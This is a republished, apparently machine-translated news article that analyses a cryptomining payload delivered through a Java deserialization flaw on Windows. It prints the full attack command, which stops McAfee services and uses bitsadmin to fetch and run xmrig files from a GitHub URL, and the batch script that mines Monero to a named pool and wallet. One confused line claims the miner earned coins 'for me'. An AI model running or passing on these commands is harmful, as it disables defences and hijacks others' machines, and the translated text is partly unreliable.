Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to take advantage of Java deserialization loophole to carry out experiments on Windows

2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Share

Shulou(Shulou.com)06/02 Report--

In this issue, Xiaobian will bring you about how to use Java deserialization vulnerabilities for experiments on Windows. The article is rich in content and analyzes and narrates from a professional perspective. After reading this article, I hope you can gain something.

Recently, there has been a lot of discussion in the security community about exploiting Java deserialization vulnerabilities to attack systems like Apache, SOLR, and LOGY. Let's cut to the chase and get straight to the point. The vast majority of these attacks currently target Linux/Unix systems, but I recently discovered a way to attack Windows.

The attack code is as follows:

cmd /c net stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

Actual Payload Analysis

Turn off McAfee antivirus software (I don't understand why this technology in the community only turns off McAfee…):

netstop "McAfee McShield;netstop mcafeeframework;

Download cryptocurrency miners and a batch script file from GitHub using bitsadmin:

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;

Batch file code is as follows:

taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

First, the above code terminates other xmrig processes (perhaps to prevent resource contention). Next, it will shut down McAfee. The mining program will then start and connect to the monerohash.com pool (port 3333). It uses only about 50% of CPU resources, presumably to avoid detection.

So far, this miner has only been able to compute 350 hashes per second and has mined 40 Monero coins (worth about $7000) for me.

The above is how to use Java deserialization vulnerabilities to experiment on Windows, if there is a similar doubt, you may wish to refer to the above analysis to understand. If you want to know more about it, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Development

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report